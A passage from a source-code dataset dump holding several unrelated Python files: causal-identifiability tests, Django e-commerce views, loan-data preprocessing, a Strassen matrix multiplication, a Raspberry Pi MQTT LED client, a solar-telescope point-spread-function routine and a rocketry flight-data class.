graph_1d.add_directed_edge(\"X\", \"Y\")\n        graph_1d.add_directed_edge(\"Z\", \"Y\")\n        graph_1d.add_undirected_edge(\"X\", \"Z\")\n        graph_1d.add_undirected_edge(\"Z\", \"Y\")\n        self.assert_not_identifiable(graph_1d, P(Y @ ~X))\n\n    def test_figure_1e(self):\n        \"\"\"Test Figure 1e.\"\"\"\n        graph_1e = NxMixedGraph()\n        graph_1e.add_directed_edge(\"Z\", \"X\")\n        graph_1e.add_directed_edge(\"X\", \"Y\")\n        graph_1e.add_undirected_edge(\"X\", \"Z\")\n        graph_1e.add_undirected_edge(\"Z\", \"Y\")\n        self.assert_not_identifiable(graph_1e, P(Y @ ~X))\n\n    def test_figure_1f(self):\n        \"\"\"Test Figure 1f.\"\"\"\n        graph_1f = NxMixedGraph()\n        graph_1f.add_directed_edge(\"X\", \"Z\")\n        graph_1f.add_directed_edge(\"Z\", \"Y\")\n        graph_1f.add_undirected_edge(\"X\", \"Y\")\n        graph_1f.add_undirected_edge(\"Z\", \"Y\")\n        self.assert_not_identifiable(graph_1f, P(Y @ ~X))\n\n    def test_figure_1g(self):\n        \"\"\"Test Figure 1g.\"\"\"\n        graph_1g = NxMixedGraph()\n        graph_1g.add_directed_edge(\"X\", \"Z1\")\n        graph_1g.add_directed_edge(\"Z1\", \"Y\")\n        graph_1g.add_directed_edge(\"Z2\", \"Y\")\n        graph_1g.add_undirected_edge(\"X\", \"Z2\")\n        graph_1g.add_undirected_edge(\"Z1\", \"Z2\")\n        self.assert_not_identifiable(graph_1g, P(Y @ ~X))\n\n    def test_figure_1h(self):\n        \"\"\"Test Figure 1h.\"\"\"\n        graph_1h = NxMixedGraph()\n        graph_1h.add_directed_edge(\"Z\", \"X\")\n        graph_1h.add_directed_edge(\"X\", \"W\")\n        graph_1h.add_directed_edge(\"W\", \"Y\")\n        graph_1h.add_undirected_edge(\"X\", \"Z\")\n        graph_1h.add_undirected_edge(\"X\", \"Y\")\n        graph_1h.add_undirected_edge(\"W\", \"Z\")\n        graph_1h.add_undirected_edge(\"Y\", \"Z\")\n        self.assert_not_identifiable(graph_1h, P(Y @ ~X))\n\n\nclass TestIdentifiable(unittest.TestCase):\n    \"\"\"Tests for identifiability.\n\n    These tests are based on the examples from the Figure 2 series on\n    https://github.com/COVID-19-Causal-Reasoning/Y0/blob/master/ID_whittemore.ipynb.\n    \"\"\"\n\n    def assert_identifiable(\n        self, graph: NxMixedGraph, query: Union[Probability, Distribution]\n    ) -> None:\n        \"\"\"Assert the graph is identifiable under the given query.\"\"\"\n        self.assertTrue(is_identifiable(graph, query))\n\n    def test_figure_2a(self):\n        \"\"\"Test Figure 2a.\"\"\"\n        graph_2a = NxMixedGraph()\n        graph_2a.add_directed_edge(\"X\", \"Y\")\n        self.assert_identifiable(graph_2a, P(Y @ ~X))\n\n    def test_figure_2b(self):\n        \"\"\"Test Figure 2B.\"\"\"\n        graph_2b = NxMixedGraph()\n        graph_2b.add_directed_edge(\"X\", \"Y\")\n        graph_2b.add_directed_edge(\"X\", \"Z\")\n        graph_2b.add_directed_edge(\"Z\", \"Y\")\n        
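# in NxMixedGraph an undirected edge encodes a latent confounder, here between Y and Z\n        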
graph_2b.add_undirected_edge(\"Y\", \"Z\")\n self.assert_identifiable(graph_2b, P(Y @ ~X))\n\n def test_figure_2c(self):\n \"\"\"Test Figure 2C.\"\"\"\n graph_2c = NxMixedGraph()\n graph_2c.add_directed_edge(\"X\", \"Y\")\n graph_2c.add_directed_edge(\"Z\", \"X\")\n graph_2c.add_directed_edge(\"Z\", \"Y\")\n graph_2c.add_undirected_edge(\"Y\", \"Z\")\n self.assert_identifiable(graph_2c, P(Y @ ~X))\n\n def test_figure_2d(self):\n \"\"\"Test Figure 2D.\"\"\"\n graph_2d = NxMixedGraph()\n graph_2d.add_directed_edge(\"X\", \"Y\")\n graph_2d.add_directed_edge(\"Z\", \"X\")\n graph_2d.add_directed_edge(\"Z\", \"Y\")\n graph_2d.add_undirected_edge(\"X\", \"Z\")\n self.assert_identifiable(graph_2d, P(Y @ ~X))\n\n def test_figure_2e(self):\n \"\"\"Test Figure 2E.\"\"\"\n graph_2e = NxMixedGraph()\n graph_2e.add_directed_edge(\"X\", \"Z\")\n graph_2e.add_directed_edge(\"Z\", \"Y\")\n graph_2e.add_undirected_edge(\"X\", \"Y\")\n self.assert_identifiable(graph_2e, P(Y @ ~X))\n\n def test_figure_2f(self):\n \"\"\"Test Figure 2f.\"\"\"\n graph_2f = NxMixedGraph()\n graph_2f.add_directed_edge(\"X\", \"Y\")\n graph_2f.add_directed_edge(\"X\", \"Z1\")\n graph_2f.add_directed_edge(\"Z1\", \"Y\")\n graph_2f.add_directed_edge(\"Z1\", \"Z2\")\n graph_2f.add_directed_edge(\"Z2\", \"Y\")\n graph_2f.add_undirected_edge(\"X\", \"Z2\")\n graph_2f.add_undirected_edge(\"Y\", \"Z1\")\n self.assert_identifiable(graph_2f, P(Y @ ~X))\n\n def test_figure_2g(self):\n \"\"\"Test Figure 2g.\"\"\"\n graph_2g = NxMixedGraph()\n graph_2g.add_directed_edge(\"Z2\", \"Z1\")\n graph_2g.add_directed_edge(\"Z2\", \"X\")\n graph_2g.add_directed_edge(\"Z2\", \"Z3\")\n graph_2g.add_directed_edge(\"X\", \"Z1\")\n graph_2g.add_directed_edge(\"Z1\", \"Y\")\n graph_2g.add_directed_edge(\"Z3\", \"Y\")\n graph_2g.add_undirected_edge(\"Z2\", \"X\")\n graph_2g.add_undirected_edge(\"Z2\", \"Y\")\n graph_2g.add_undirected_edge(\"X\", \"Z3\")\n graph_2g.add_undirected_edge(\"X\", \"Y\")\n self.assert_identifiable(graph_2g, P(Y @ ~X))\n","sub_path":"tests/test_is_identifiable.py","file_name":"test_is_identifiable.py","file_ext":"py","file_size_in_byte":7233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"149536103","text":"from django.shortcuts import render,reverse\nfrom django.contrib.auth.forms import UserCreationForm\nfrom zappyapp.models import Product,Customer,Cart\nfrom django.http import HttpResponseRedirect,HttpResponse\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.models import User\nfrom zappyapp.forms import CustomerUpdate\nfrom django.db.models import Q\n# Create your views here.\n\n\ndef home(request):\n products=Product.objects.all()\n return render(request,'zappyapp/home.html',{'products':products})\n\ndef rte(request):\n products=Product.objects.filter(cat_choice='rte')\n return render(request,'zappyapp/rte.html',{'products':products})\n\ndef rtc(request):\n products=Product.objects.filter(cat_choice='rtc')\n return render(request,'zappyapp/rtc.html',{'products':products})\n\n\ndef registration(request):\n sform=UserCreationForm(request.POST or None)\n if sform.is_valid():\n new_user=sform.save()\n return HttpResponseRedirect(reverse('zappyapp:home'))\n\n return render(request,'zappyapp/registration.html',{'sform':sform})\n\n@login_required\ndef profile(request):\n return render(request, 'zappyapp/profile.html')\n\n\n@login_required\ndef cprofile(request):\n if request.method == 'POST':\n cu_form = 
CustomerUpdate(instance=request.user.customer)\n    return render(request, 'zappyapp/cprofile.html',{'cu_form':cu_form})\n\n\ndef productsdetails(request,id):\n    products=Product.objects.get(id=id)\n\n    context={'products':products}\n    return render(request,'zappyapp/productdetails.html',context=context)\n\ndef search(request):\n    query=request.GET.get('q',None)\n    if query is not None:\n        query2= Q(pname__iexact=query) | Q(description__icontains=query)\n        products=Product.objects.filter(query2).distinct()\n\n        return render(request,'zappyapp/home.html',{'products':products})\n    else:\n        return HttpResponseRedirect(reverse('zappyapp:home'))\n\n\ndef cart_home(request):\n    cart_obj, new_obj=Cart.objects.new_or_get(request)\n    products=cart_obj.products.all()\n    total=0\n    for x in products:\n        total+=x.price\n    return render(request,'zappyapp/cart.html')#,{'val':val}\n\ndef cart_update(request):\n    product_id=request.POST.get('product_id')\n    print(product_id)\n    cart_obj, new_obj=Cart.objects.new_or_get(request) #fetch the active cart before toggling the product\n    if product_id is not None:\n        try:\n            product=Product.objects.get(id=product_id)\n        except Product.DoesNotExist:\n            print('no product')\n            return HttpResponseRedirect(reverse('zappyapp:home'))\n        if product in cart_obj.products.all():\n            cart_obj.products.remove(product)\n        else:\n            cart_obj.products.add(product)\n    products=Product.objects.get(id=product_id)\n    return render(request,'zappyapp/productdetails.html',{'products':products})\n","sub_path":"zappyproject/zappyapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"51108058","text":"import pandas as pd\n\n#Read in the data - loan prediction dataset\n#change labels to numbers. N = 0 and Y = 1\n\n#Drop Dependents/loan_amount_term, loan_id columns\n#Remove rows with missing data\n#Standardize/Normalize applicant/co-applicant income/loan amount column between 0 and 1\n#Change property (Rural - 0, Semiurban - 0.5, Urban - 1)\n\ndef pre_process_data(data, limit=None):\n    print (\"Reading and processing data:\")\n    #read in data\n    data = pd.read_csv(data)\n\n    #convert these columns to 0 or 1\n    data.loc[data['Loan_Status'] == \"N\", 'Loan_Status'] = 0\n    data.loc[data['Loan_Status'] == \"Y\", 'Loan_Status'] = 1\n\n    data.loc[data['Gender'] == \"Male\", 'Gender'] = 0\n    data.loc[data['Gender'] == \"Female\", 'Gender'] = 1\n\n    data.loc[data['Married'] == \"No\", 'Married'] = 0\n    data.loc[data['Married'] == \"Yes\", 'Married'] = 1\n\n    data.loc[data['Education'] == \"Not Graduate\", 'Education'] = 0\n    data.loc[data['Education'] == \"Graduate\", 'Education'] = 1\n\n    data.loc[data['Self_Employed'] == \"No\", 'Self_Employed'] = 0\n    data.loc[data['Self_Employed'] == \"Yes\", 'Self_Employed'] = 1\n\n    #drop irrelevant columns for this project\n    data = data.drop(columns = ['Dependents', 'Loan_Amount_Term', 'Loan_ID'])\n\n    #converting property area data to between 0 and 1\n    data.loc[data['Property_Area'] == \"Rural\", 'Property_Area'] = 0\n    data.loc[data['Property_Area'] == \"Semiurban\", 'Property_Area'] = 0.5\n    data.loc[data['Property_Area'] == \"Urban\", 'Property_Area'] = 1\n\n    #removing rows with missing values\n    data = data.dropna()\n    #return data.isnull().values.any()\n\n    #Tip: Which Method To Use (standardizing or normalizing?)\n    #It is hard to know whether rescaling your data will improve the performance of your algorithms before you apply them. 
\n    #It often can, but not always.\n    #A good tip is to create rescaled copies of your dataset and \n    #race them against each other using your test harness and a handful of algorithms you want to spot check. \n    #This can quickly highlight the benefits (or lack thereof) of rescaling your data with given models, \n    #and which rescaling method may be worthy of further investigation.\n\n    #To learn, normalize these columns (MinMax scaler) and standardize (mean and sd), then compare performance\n\n    data['ApplicantIncome']=(data['ApplicantIncome']-data['ApplicantIncome'].min())/(data['ApplicantIncome'].max()-data['ApplicantIncome'].min())\n    data['CoapplicantIncome']=(data['CoapplicantIncome']-data['CoapplicantIncome'].min())/(data['CoapplicantIncome'].max()-data['CoapplicantIncome'].min())\n    data['LoanAmount']=(data['LoanAmount']-data['LoanAmount'].min())/(data['LoanAmount'].max()-data['LoanAmount'].min())\n\n    return data\n\n#test function\ncheck_data = pre_process_data('loan_data.csv')\nprint (check_data)\n\n","sub_path":"KNearest_Neighbors/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":2813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"546850504","text":"#!/usr/bin/env python3\n\n\"\"\"\nAUTHOR: Cody Kankel\nPROG: Serial_matrix.py\nDESC: This Python 3 script is a serial version of parallel_matrix.py.\nMPI4py is still required for this serial version as the MPI time is \nstill being used to calculate the run time of Strassen algorithm.\nThis serial version needs to be run with only 1 proc/rank, and it\nwill multiply two matrices together, both the same matrix as specified\non the cmd line while executing this script. Example:\n    mpirun -np 1 serial_matrix.py csv/4096_4096.csv\n\"\"\"\n\n\nimport numpy, sys, csv, math\nfrom mpi4py import MPI\n\ndef main():\n    \"\"\"Main will read and initialize 2 matrices, print them,\n    generate the correct dot product of them, and send them off to the\n    strassen function to be calculated there. It is up to the user of this\n    program as of right now to verify the strassen method is working.\"\"\"\n    \n    if len(sys.argv) != 2:\n        sys.exit(2)\n    \n    \n    matrix_A = get_matrix(str(sys.argv[1]))\n    matrix_B = get_matrix(str(sys.argv[1]))\n    \n    \n    #print('Matrix A is:')\n    #print(matrix_A )\n    #print('Matrix B is:')\n    #print(matrix_B)\n    #print('-'.center(40,'-'))\n    #print('The correct product of these matrices is:')\n    #print(numpy.dot(matrix_A, matrix_B))\n    \n    if matrix_A.shape != matrix_B.shape:\n        print('Error: Matrix A and Matrix B are not the same size Matrix.')\n        sys.exit()\n    \n    a_subSize = int(get_dim(matrix_A)/2)\n    b_subSize = int(get_dim(matrix_B)/2)\n    if a_subSize != b_subSize:\n        print(\"error\")\n        sys.exit()\n    startTime = MPI.Wtime()\n    \n    matrix_C = strassen(matrix_A, matrix_B, a_subSize)\n    \n    # Leaving MPI in the serial version solely for the use of the MPI time.\n    runTime = MPI.Wtime() - startTime\n    \n    print(\"The time to calculate strassen function serially is:\\n\", runTime)\n\n    sys.exit()\n\ndef get_matrix(fileName):\n    \"\"\"Function to open a specified file and read the contents using the csv module.\n    Function will return a numpy matrix (formatted). 
'fileName' argument MUST be a string\"\"\"\n \n with open(fileName, 'r') as file_ob:\n reader = csv.reader(file_ob)\n temp_list = list(reader)\n temp_list = temp_list[0]\n temp_list = list(map(int, temp_list))\n matr_len = len(temp_list)\n new_shape = int(math.sqrt(matr_len))\n matrix = numpy.asarray(temp_list)\n matrix = matrix.reshape(new_shape, new_shape)\n return matrix\n \ndef strassen(A, B, subSize):\n \"\"\"Function to perform the strassen algorithm on 2 numpy matricies specified as\n A and B. The function will return the dot product of these two matricies\n as a numpy.array matrix.\"\"\"\n \n \n # Rank 0 is the master, so it will prepare everything to be parallelized\n a_11 = A[0:subSize, 0:subSize]\n a_12 = A[0:subSize, subSize:]\n a_21 = A[subSize:, 0:subSize]\n a_22 = A[subSize:, subSize:]\n \n b_11 = B[0:subSize, 0:subSize]\n b_12 = B[0:subSize, subSize:]\n b_21 = B[subSize:, 0:subSize]\n b_22 = B[subSize:, subSize:]\n \n \n m1 = (a_11 + a_22).dot((b_11 + b_22))\n m2 = ((a_21 + a_22).dot(b_11))\n m3 = a_11.dot(b_12 - b_22)\n m4 = a_22.dot(b_21 - b_11)\n m5 = (a_11 + a_12).dot(b_22)\n m6 = (a_21 - a_11).dot(b_11 + b_12)\n m7 = (a_12 - a_22).dot((b_21 + b_22))\n \n \n\n C11 = m1 + m4 - m5 + m7\n C12 = m3 + m5\n C21 = m2 + m4\n C22 = m1 -m2 + m3 + m6\n \n\n # making final matrix from each piece\n C = numpy.bmat([[C11, C12], [C21, C22]])\n return C\n\n\ndef get_dim(matrix):\n \"\"\"Function to get the dim of a matrix and return. Assumes the matricies are\n already square. Returns an integer for the dim of the matrix\"\"\"\n return int((str(matrix.shape).split(',')[0].replace('(','')))\n\n# Standard boilerplate to call the main() function.\nif __name__ == '__main__':\n main()\n","sub_path":"src/Python/serial_matrix.py","file_name":"serial_matrix.py","file_ext":"py","file_size_in_byte":3904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"452502092","text":"'''\nCreated on Dec 7, 2018\n \n@author: stannis\n'''\nimport os,sys\nsys.path.append('/home/pi/Desktop/zexin/iot-device/apps')\nimport paho.mqtt.client as mqttClient\nfrom labs.module03 import SenseHatLedActivator\nclass MQTTClient(): \n def on_connect(self, clientConn, data, flags, resultCode):\n print(\"Client connected to server. Result: \" + str(resultCode))\n clientConn.subscribe(\"myActuatorData\")\n \n def on_message(self,clientConn, data, msg):\n print(\"Received PUBLISH on topic {0}. 
Payload: {1}\".format(str(msg.topic), str(msg.payload)))\n senledActivator = SenseHatLedActivator.SenseHatLedActivator()\n print(msg.payload)\n senledActivator.setDisplayMessage(msg.payload)\n senledActivator.setEnableLedFlag(True)\n senledActivator.run()\n \n def go(self):\n self.mc = mqttClient.Client()\n self.mc.on_connect = self.on_connect\n self.mc.on_message = self.on_message\n \n self.mc.connect(\"test.mosquitto.org\", 1883, 60)\n self.mc.loop_forever()\n \n","sub_path":"iot-device/apps/labs/module03/MQTTClient.py","file_name":"MQTTClient.py","file_ext":"py","file_size_in_byte":1054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"10779435","text":"\"\"\"\nCalculate the point spread function (PSF) for the AIA telescopes\n\"\"\"\nimport numpy as np\nimport astropy.units as u\ntry:\n import cupy\n from cupy import prof\n HAS_CUPY = True\n\nexcept ImportError:\n HAS_CUPY = False\n\n__all__ = ['psf', 'filter_mesh_parameters', '_psf']\n\n\ndef filter_mesh_parameters(use_preflightcore=False):\n \"\"\"\n Geometric parameters for meshes in AIA filters used to calculate the\n point spread function.\n\n Parameters\n ----------\n use_preflightcore : `bool`, optional\n If True, use the pre-flight values for the filter mesh parameters\n\n Returns\n -------\n meshinfo : `dict`\n Dictionary with filter mesh information for each channel. Each channel\n entry then contains another dictionary with the following keys\n describing filter mesh properties of that channel\n (see Table 2 of [1]_):\n\n * `angle_arm`: Angles of the four entrance filter arms\n * `error_angle_arm`: Error in angle of the four entrance filter arms\n * `spacing_e`: Distance between diffraction spikes from entrance filter\n * `spacing_fp`: Distance between diffraction spikes from focal plane\n filter\n * `mesh_pitch`: Pitch of the mesh\n * `mesh_width`: Width of the mesh\n * `width`: Width applied to the Gaussian such that *after*\n convolution we have the proper width\n (:math:`4/3` at :math:`1/e` of max)\n\n References\n ----------\n .. 
[1] `Grigis, P., Su, Y., Weber M., et al., 2012,\n AIA PSF Characterization and Deconvolution\n `_\n\n See Also\n --------\n psf : Calculate the composite point spread function\n \"\"\"\n # These parameters were calculated from the following images and\n # reference background images:\n # 94:\n # image: 'AIA20101016_191039_0094.fits'\n # reference: 'AIA20101016_190903_0094.fits'\n # 131:\n # image: 'AIA20101016_191035_0131.fits'\n # reference: 'AIA20101016_190911_0131.fits'\n # 171:\n # image: 'AIA20101016_191037_0171.fits'\n # reference: 'AIA20101016_190901_0171.fits'\n # 193:\n # image: 'AIA20101016_191056_0193.fits'\n # reference: 'AIA20101016_190844_0193.fits'\n # 211:\n # image: 'AIA20101016_191038_0211.fits'\n # reference: 'AIA20101016_190902_0211.fits'\n # 304:\n # image: 'AIA20101016_191021_0304.fits'\n # reference: 'AIA20101016_190845_0304.fits'\n # 335:\n # image: 'AIA20101016_191041_0335.fits'\n # reference: 'AIA20101016_190905_0335.fits'\n # TODO: put this in another file, either JSON or asdf\n return {\n 94 * u.angstrom: {\n 'angle_arm': [49.81, 40.16, -40.28, -49.92] * u.deg,\n 'error_angle_arm': [0.02, 0.02, 0.02, 0.02] * u.deg,\n 'spacing_e': 8.99 * u.pixel,\n 'mesh_pitch': 363.0 * u.um,\n 'mesh_width': 34.0 * u.um,\n 'spacing_fp': 0.207 * u.pixel,\n 'width': (0.951 if use_preflightcore else 4.5) * u.pixel,\n 'CDELT': [0.600109, 0.600109]*u.arcsec,\n },\n 131 * u.angstrom: {\n 'angle_arm': [50.27, 40.17, -39.70, -49.95] * u.deg,\n 'error_angle_arm': [0.02, 0.02, 0.02, 0.02] * u.deg,\n 'spacing_e': 12.37 * u.pixel,\n 'mesh_pitch': 363.0 * u.um,\n 'mesh_width': 34.0 * u.um,\n 'spacing_fp': 0.289 * u.pixel,\n 'width': (1.033 if use_preflightcore else 4.5) * u.pixel,\n 'CDELT': [0.600698, 0.600698]*u.arcsec,\n },\n 171 * u.angstrom: {\n 'angle_arm': [49.81, 39.57, -40.13, -50.38] * u.deg,\n 'error_angle_arm': [0.02, 0.02, 0.02, 0.02] * u.deg,\n 'spacing_e': 16.26 * u.pixel,\n 'mesh_pitch': 363.0 * u.um,\n 'mesh_width': 34.0 * u.um,\n 'spacing_fp': 0.377 * u.pixel,\n 'width': (0.962 if use_preflightcore else 4.5) * u.pixel,\n 'CDELT': [0.599489, 0.599489]*u.arcsec,\n },\n 193 * u.angstrom: {\n 'angle_arm': [49.82, 39.57, -40.12, -50.37] * u.deg,\n 'error_angle_arm': [0.02, 0.02, 0.03, 0.04] * u.deg,\n 'spacing_e': 18.39 * u.pixel,\n 'mesh_pitch': 363.0 * u.um,\n 'mesh_width': 34.0 * u.um,\n 'spacing_fp': 0.425 * u.pixel,\n 'width': (1.512 if use_preflightcore else 4.5) * u.pixel,\n 'CDELT': [0.600758, 0.600758]*u.arcsec,\n },\n 211 * u.angstrom: {\n 'angle_arm': [49.78, 40.08, -40.34, -49.95] * u.deg,\n 'error_angle_arm': [0.02, 0.02, 0.02, 0.02] * u.deg,\n 'spacing_e': 19.97 * u.pixel,\n 'mesh_pitch': 363.0 * u.um,\n 'mesh_width': 34.0 * u.um,\n 'spacing_fp': 0.465 * u.pixel,\n 'width': (1.199 if use_preflightcore else 4.5) * u.pixel,\n 'CDELT': [0.600758, 0.600758]*u.arcsec,\n },\n 304 * u.angstrom: {\n 'angle_arm': [49.76, 40.18, -40.14, -49.90] * u.degree,\n 'error_angle_arm': [0.02, 0.02, 0.02, 0.02] * u.deg,\n 'spacing_e': 28.87 * u.pixel,\n 'mesh_pitch': 363.0 * u.um,\n 'mesh_width': 34.0 * u.um,\n 'spacing_fp': 0.670 * u.pixel,\n 'width': (1.247 if use_preflightcore else 4.5) * u.pixel,\n 'CDELT': [0.600165, 0.600165]*u.arcsec,\n },\n 335 * u.angstrom: {\n 'angle_arm': [50.40, 39.80, -39.64, -50.25] * u.degree,\n 'error_angle_arm': [0.02, 0.02, 0.02, 0.02] * u.deg,\n 'spacing_e': 31.83 * u.pixel,\n 'mesh_pitch': 363.0 * u.um,\n 'mesh_width': 34.0 * u.um,\n 'spacing_fp': 0.738 * u.pixel,\n 'width': (0.962 if use_preflightcore else 4.5) * u.pixel,\n 'CDELT': [0.600737, 
0.600737]*u.arcsec,\n },\n }\n\n\n@u.quantity_input\ndef psf(channel: u.angstrom, use_preflightcore=False, diffraction_orders=None):\n \"\"\"\n Calculate the composite PSF for a given channel, including diffraction and\n core effects.\n\n .. note:: This function has been adapted from\n `aia_calc_psf.pro `_.\n\n .. note:: If the `cupy` package is installed\n and your machine has an NVIDIA GPU, the PSF calculation will\n automatically be accelerated with CUDA. This can lead to\n several orders of magnitude in performance increase compared to\n pure `numpy` on a CPU.\n\n The point spread function (PSF) can be modeled as a 2D Gaussian function\n of the radial distance :math:`r` from the center,\n\n .. math::\n\n I(r, \\\\theta) = I_0 \\exp\\left(\\\\frac{-r^2}{2\\sigma^2}\\\\right)\n\n where,\n\n - :math:`I_0` : the intensity of a diffraction spike\n - :math:`r` : the radial distance from the center\n - :math:`\\\\theta = m\\lambda/d`\n - :math:`m` : diffraction order\n - :math:`\\lambda` : the wavelength of light\n - :math:`\\sigma` : width of Gaussian\n\n The intensity of a particular diffraction spike, :math:`I_0`, is given by,\n\n .. math::\n\n I_0 = \\mathrm{sinc}^2\\left(\\\\frac{\\\\theta w}{\\lambda}\\\\right)\n\n where,\n\n - :math:`w` : the width of the mesh wires\n - :math:`d` : spacing between two consecutive mesh wires\n\n The PSF for a given filter can then be calculated as,\n\n .. math::\n\n \\mathrm{PSF} = \\sum_{m=-\\infty}^{+\\infty}I_m(r,\\\\theta)\n\n where, in practice, one can approximate the summation by simply summing\n over a sufficiently large number of diffraction orders. In this case, we\n sum from :math:`m=--100` to :math:`m=100`.\n\n Finally, the composite PSF of the entrance and focal plane filters is\n given by,\n\n .. math::\n\n \\mathrm{PSF}_c = \\left|\\mathcal{F}\\left\\{\n \\mathcal{F}\\{\\mathrm{PSF}_f\\}\n \\mathcal{F}\\{\\mathrm{PSF}_e\\}\n \\\\right\\}\\\\right|\n\n where :math:`\\mathcal{F}` denotes the Fourier transform,\n :math:`\\mathrm{PSF}_f` is the PSF of the focal plane filter, and\n :math:`\\mathrm{PSF}_e` is the PSF of the entrance filter. For a more\n detailed explanation of the PSF and the above calculation, see [1]_.\n\n Parameters\n ----------\n channel : `~astropy.units.Quantity`\n Wavelength of channel\n use_preflightcore : `bool`, optional\n If True, use the pre-flight values of the mesh width\n diffraction_orders : array-like, optional\n The diffraction orders to sum over. If None, the full\n range from -100 to +100 in steps of 1 will be used.\n\n Returns\n -------\n `~numpy.ndarray`\n The composite PSF of the entrance and focal plane filters.\n\n See Also\n --------\n filter_mesh_parameters\n deconvolve\n\n References\n ----------\n .. 
[1] `Grigis, P., Su, Y., Weber M., et al., 2012,\n AIA PSF Characterization and Deconvolution\n `_\n \"\"\"\n meshinfo = filter_mesh_parameters(use_preflightcore=use_preflightcore)\n meshinfo = meshinfo[channel]\n\n angles_entrance = meshinfo['angle_arm']\n angles_focal_plane = u.Quantity([45.0, -45.0], 'deg')\n\n if diffraction_orders is None:\n diffraction_orders = np.arange(-100, 101, 1)\n\n psf_entrance = _psf(meshinfo, angles_entrance, diffraction_orders)\n psf_focal_plane = _psf(meshinfo, angles_focal_plane, diffraction_orders,\n focal_plane=True)\n\n # Composite PSF\n psf = abs(np.fft.fft2(np.fft.fft2(psf_focal_plane)\n * np.fft.fft2(psf_entrance)))\n\n # Center PSF in the middle of the image\n psf = np.roll(np.roll(psf, psf.shape[1]//2, axis=1),\n psf.shape[0]//2,\n axis=0)\n # Normalize by total number of pixels\n psf = psf/(psf.shape[0]*psf.shape[1])\n # If using cupy, cast back to a normal numpy array\n if HAS_CUPY:\n psf = cupy.asnumpy(psf)\n\n return psf\n\n\n# from cupy import prof\n\ndef _psf(meshinfo, angles, diffraction_orders, focal_plane=False):\n with prof.time_range('setup',0): \n psf = np.zeros((4096, 4096), dtype=float)\n # If cupy is available, cast to a cupy array\n if HAS_CUPY:\n psf = cupy.array(psf) # asarray, or create on device rather than copy\n Nx, Ny = psf.shape\n width_x = meshinfo['width'].value\n width_y = meshinfo['width'].value\n # x and y position grids\n x = np.outer(np.ones(Ny), np.arange(Nx) + 0.5)\n y = np.outer(np.arange(Ny) + 0.5, np.ones(Nx))\n if HAS_CUPY:\n x = cupy.array(x) # same as above, either asarray or create on device rather than copy\n y = cupy.array(y)\n\n with prof.time_range('stuff',1):\n area_not_mesh = 0.82 # fractional area not covered by the mesh\n spacing = meshinfo['spacing_fp'] if focal_plane else meshinfo['spacing_e']\n mesh_ratio = (meshinfo['mesh_pitch'] / meshinfo['mesh_width']).decompose().value\n spacing_x = spacing * np.cos(angles)\n spacing_y = spacing * np.sin(angles)\n\n with prof.time_range('for_1',2):\n for order in diffraction_orders:\n with prof.time_range('order',3): \n if order == 0:\n continue\n intensity = np.sinc(order / mesh_ratio)**2 # I_0\n for dx, dy in zip(spacing_x.value, spacing_y.value):\n with prof.time_range('dx_dy',4): \n x_centered = x - (0.5*Nx + dx*order + 0.5)\n y_centered = y - (0.5*Ny + dy*order + 0.5)\n # NOTE: this step is the bottleneck and is VERY slow on a CPU\n psf += np.exp(-width_x*x_centered*x_centered\n - width_y*y_centered*y_centered)*intensity\n\n # Contribution from core\n with prof.time_range('psf_core',5): \n psf_core = np.exp(-width_x*(x - 0.5*Nx - 0.5)**2\n - width_y*(y - 0.5*Ny - 0.5)**2)\n with prof.time_range('psf_total',6): \n psf_total = ((1 - area_not_mesh) * psf / psf.sum()\n + area_not_mesh * psf_core / psf_core.sum())\n\n return psf_total\n","sub_path":"code/Schuck/psf_profiles_marker.py","file_name":"psf_profiles_marker.py","file_ext":"py","file_size_in_byte":12410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"288836830","text":"from config import Config\n\nclass Flight:\n __flightData = {}\n\n def __init__(self):\n self.__flightData = {\n \"Temperature\" : 0,\n \"Wind Speed\" : 0,\n \"Humidity\" : 0,\n \"Payload Name\" : \"\",\n \"Booster Name\" : \"\",\n \"Motor Name\" : \"\",\n \"Parachute Name\" : \"\",\n \"Motor Delay\" : 0,\n \"Payload\" : 0,\n \"Booster\" : 0,\n \"Eggs\" : [],\n \"Parachute\" : 0,\n \"Nomex\" : 0,\n \"Insulation\" : 0,\n \"Ballast\" : 0,\n \"Casing\" : 0,\n \"Motor\" : 0,\n 
\"Time\" : 0,\n            \"Altitude\" : 0,\n            \"Modifications\" : [],\n            \"Damages\" : [],\n            \"Characteristics\" : [],\n            \"Considerations\" : []\n        }\n\n    # for \"Eggs\" field, input the list directly\n    def set(self, field, value):\n        if field in self.__flightData and not (field in Config._OBSERVATIONS):\n            if type(self.__flightData[field]) is type(value):\n                self.__flightData[field] = value\n            else:\n                raise ValueError(Config._EXCEPTION_1)\n        else:\n            raise ValueError(Config._EXCEPTION_0)\n\n    # for \"Eggs\" field, returns the list directly\n    def get(self, field):\n        if field in self.__flightData and not (field in Config._OBSERVATIONS):\n            return self.__flightData[field]\n        else:\n            raise ValueError(Config._EXCEPTION_0)\n\n    def score(self):\n        score = 0\n        time = self.__flightData[\"Time\"]\n        altitude = self.__flightData[\"Altitude\"]\n        if time < Config._MIN_TIME:\n            score += 4 * (Config._MIN_TIME - time)\n        elif time > Config._MAX_TIME:\n            score += 4 * (time - Config._MAX_TIME)\n        return (score + abs(altitude - Config._ALTITUDE))\n\n    def totalMass(self):\n        total = 0\n        for mass in Config._MASS_COMPONENTS:\n            if mass == \"Eggs\":\n                for eggMass in self.__flightData[mass]:\n                    total += eggMass\n            else:\n                total += self.__flightData[mass]\n\n        return total\n\n    def addObservation(self, field, message):\n        if field in Config._OBSERVATIONS:\n            if isinstance(message, str):\n                self.__flightData[field].append(message)\n            else:\n                raise ValueError(Config._EXCEPTION_1)\n        else:\n            raise ValueError(Config._EXCEPTION_0)\n\n    def removeObservation(self, field, i):\n        if field in Config._OBSERVATIONS:\n            if i in range(0, len(self.__flightData[field])):\n                return self.__flightData[field].pop(i)\n            else:\n                raise 